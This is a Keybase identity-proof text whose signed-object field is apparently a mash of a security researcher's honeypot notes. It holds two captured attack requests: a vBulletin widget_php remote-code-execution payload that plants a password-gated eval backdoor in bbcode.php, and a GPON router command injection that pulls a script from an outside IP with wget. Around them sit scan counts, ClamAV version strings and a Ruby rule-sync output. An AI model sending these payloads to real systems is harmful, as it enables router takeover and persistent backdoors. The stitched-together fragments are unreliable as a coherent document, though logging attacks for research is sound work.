I hereby claim:
- I am balgan on github.
- I am balgan (https://keybase.io/balgan) on keybase.
- I have a public key whose fingerprint is BD0A 2C9A AAEF 8204 44D0 E119 00CD C6A5 B6B6 6C1D
To claim this, I am signing this object:
POST/index.php?routestring=ajax/render/widget_phpHTTP/1.1\\r\\nHost:XX.XX.XX.XX\\r\\nUser-Agent:Mozilla/5.0(Linux;Android9;MHA-AL00Build/HUAWEIMHA-AL00;wv)AppleWebKit/537.36(KHTML,likeGecko)Version/4.0Chrome/71.0.3578.99MobileSafari/537.36MMWEBID/9772MicroMessenger/7.0.6.1460(0x27000634)Process/toolsNetType/WIFILanguage/zh_CN\\r\\nContent-Length:378\\r\\nContent-Type:application/x-www-form-urlencoded\\r\\nAccept-Encoding:gzip\\r\\n\\r\\nwidgetConfig[code]=echo+shell_exec('sed+-i+\'s/eval(\$code);/if+(isset(\$_REQUEST[\"epass\"])+\&\&+\$_REQUEST[\"epass\"]+==+\"2dmfrb28nu3c6s9j\")+{+eval(\$code);+}/g\'+includes/vb5/frontend/controller/bbcode.php+&&+echo+-n+exploited+|+md5sum');+exit;"
# of unique ips scanning last 30 days
4201
# of connections
@timestamp per day Count
August 29th 2018, 00:00:00.000 17,837
August 30th 2018, 00:00:00.000 24,870
August 31st 2018, 00:00:00.000 16,542
September 1st 2018, 00:00:00.000 16,033
September 2nd 2018, 00:00:00.000 11,127 |
POST /GponForm/diag_Form?images/ HTTP/1.1\\r\\nCache-Control: no-cache\\r\\nConnection: keep-alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\r\\nHost: 178.62.43.33:80\\r\\nContent-Type: text/plain\\r\\nContent-length: 119\\r\\n\\r\\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0 |
5642
1 ClamAV 0.80/1168/Fri
2 ClamAV 0.80/5521/Wed
1 ClamAV 0.80rc3/510/Thu
2 ClamAV 0.83/8762/Mon
2 ClamAV 0.86.2/989/Sat
4 ClamAV 0.87/1082/Wed
2 ClamAV 0.88.2/1428/Thu
1 ClamAV 0.88.6/8082/Sun
1 ClamAV 0.88/1579/Sat |
root@ubuntu:/home/balgan/sourceradar# ruby RuleSync.rb Ruby
!!Loading rules for Ruby!!
mail_to :encode => :javascript
FileUtils.remove_entry_secure
$SAFE
limit
BigDecimal
strip_tag
JSON.parse |